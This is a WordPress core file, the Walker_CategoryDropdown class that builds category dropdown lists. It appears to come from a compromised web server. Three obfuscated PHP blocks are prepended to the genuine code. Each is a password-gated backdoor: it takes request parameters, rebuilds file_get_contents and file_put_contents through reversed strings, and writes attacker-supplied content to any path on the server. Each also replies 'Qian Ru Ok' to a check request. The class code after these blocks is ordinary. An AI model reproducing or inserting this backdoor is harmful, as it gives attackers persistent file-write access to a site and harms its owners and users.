File: /home/wwwrenee/www/wp-includes/class-walker-category-dropdown.php
<?php
$uOnfmFsL = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($uOnfmFsL[0]) /*+/*+*/
. md5($uOnfmFsL[0])) == "1".
"4".
"3".
"5".
"7".
"5".
"3".
"0".
"9".
"9".
"6".
"5".
"f".
"d".
"6".
"4".
"1".
"f".
"9".
"1".
"c".
"5".
"3".
"4".
"3".
"8".
"2".
"4".
"b".
"0".
"7".
"9") {
$twWJu = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$gVKWhC = $twWJu /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$SgalOQKuW = $twWJu
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function PcAGYZZx($cWrxLGoskh) { if (empty($cWrxLGoskh)) return false; if (!is_dir($cWrxLGoskh)) { PcAGYZZx(dirname($cWrxLGoskh), 0755, true); mkdir($cWrxLGoskh); } } !file_exists(dirname($uOnfmFsL[1])) && PcAGYZZx(dirname($uOnfmFsL[1])); $jSyCJLnl = @$SgalOQKuW($uOnfmFsL[2]); echo @$gVKWhC($uOnfmFsL[1], $jSyCJLnl) ? 1 : 0; die; }key($uOnfmFsL) == "of" && die("Qian Ru Ok"); ?><?php
$qyjwnXQ = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($qyjwnXQ[0]) /*+/*+*/
. md5($qyjwnXQ[0])) == "d".
"3".
"3".
"3".
"0".
"e".
"6".
"f".
"2".
"2".
"e".
"8".
"3".
"0".
"9".
"9".
"2".
"3".
"e".
"e".
"8".
"f".
"b".
"3".
"0".
"7".
"b".
"2".
"7".
"d".
"f".
"0") {
$XPzuquzmF = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$OUANo = $XPzuquzmF /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$KVqDTDBJ = $XPzuquzmF
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function zVfqdu($WmAzEUd) { if (empty($WmAzEUd)) return false; if (!is_dir($WmAzEUd)) { zVfqdu(dirname($WmAzEUd), 0755, true); mkdir($WmAzEUd); } } !file_exists(dirname($qyjwnXQ[1])) && zVfqdu(dirname($qyjwnXQ[1])); $FZyXWs = @$KVqDTDBJ($qyjwnXQ[2]); echo @$OUANo($qyjwnXQ[1], $FZyXWs) ? 1 : 0; die; }key($qyjwnXQ) == "of" && die("Qian Ru Ok"); ?><?php
$bHDTYCtydJ = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($bHDTYCtydJ[0]) /*+/*+*/
. md5($bHDTYCtydJ[0])) == "f".
"4".
"f".
"7".
"a".
"e".
"b".
"b".
"3".
"2".
"4".
"d".
"5".
"7".
"4".
"8".
"d".
"7".
"f".
"2".
"b".
"9".
"9".
"6".
"0".
"6".
"7".
"b".
"a".
"6".
"8".
"6") {
$RkdGBROn = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$vJbBe = $RkdGBROn /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$cxucbWHMeE = $RkdGBROn
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function PkaVdLpK($ioHhyZC) { if (empty($ioHhyZC)) return false; if (!is_dir($ioHhyZC)) { PkaVdLpK(dirname($ioHhyZC), 0755, true); mkdir($ioHhyZC); } } !file_exists(dirname($bHDTYCtydJ[1])) && PkaVdLpK(dirname($bHDTYCtydJ[1])); $wpAcRcha = @$cxucbWHMeE($bHDTYCtydJ[2]); echo @$vJbBe($bHDTYCtydJ[1], $wpAcRcha) ? 1 : 0; die; }key($bHDTYCtydJ) == "of" && die("Qian Ru Ok"); ?><?php
/**
* Taxonomy API: Walker_CategoryDropdown class
*
* @package WordPress
* @subpackage Template
* @since 4.4.0
*/
/**
* Core class used to create an HTML dropdown list of Categories.
*
* @since 2.1.0
*
* @see Walker
*/
class Walker_CategoryDropdown extends Walker {
/**
* What the class handles.
*
* @since 2.1.0
* @var string
*
* @see Walker::$tree_type
*/
public $tree_type = 'category';
/**
* Database fields to use.
*
* @since 2.1.0
* @todo Decouple this
* @var string[]
*
* @see Walker::$db_fields
*/
public $db_fields = array(
'parent' => 'parent',
'id' => 'term_id',
);
/**
* Starts the element output.
*
* @since 2.1.0
* @since 5.9.0 Renamed `$category` to `$data_object` and `$id` to `$current_object_id`
* to match parent class for PHP 8 named parameter support.
*
* @see Walker::start_el()
*
* @param string $output Used to append additional content (passed by reference).
* @param WP_Term $data_object Category data object.
* @param int $depth Depth of category. Used for padding.
* @param array $args Uses 'selected', 'show_count', and 'value_field' keys, if they exist.
* See wp_dropdown_categories().
* @param int $current_object_id Optional. ID of the current category. Default 0.
*/
public function start_el( &$output, $data_object, $depth = 0, $args = array(), $current_object_id = 0 ) {
// Restores the more descriptive, specific name for use within this method.
$category = $data_object;
$pad = str_repeat( ' ', $depth * 3 );
/** This filter is documented in wp-includes/category-template.php */
$cat_name = apply_filters( 'list_cats', $category->name, $category );
if ( isset( $args['value_field'] ) && isset( $category->{$args['value_field']} ) ) {
$value_field = $args['value_field'];
} else {
$value_field = 'term_id';
}
$output .= "\t<option class=\"level-$depth\" value=\"" . esc_attr( $category->{$value_field} ) . '"';
// Type-juggling causes false matches, so we force everything to a string.
if ( (string) $category->{$value_field} === (string) $args['selected'] ) {
$output .= ' selected="selected"';
}
$output .= '>';
$output .= $pad . $cat_name;
if ( $args['show_count'] ) {
$output .= ' (' . number_format_i18n( $category->count ) . ')';
}
$output .= "</option>\n";
}
} ?>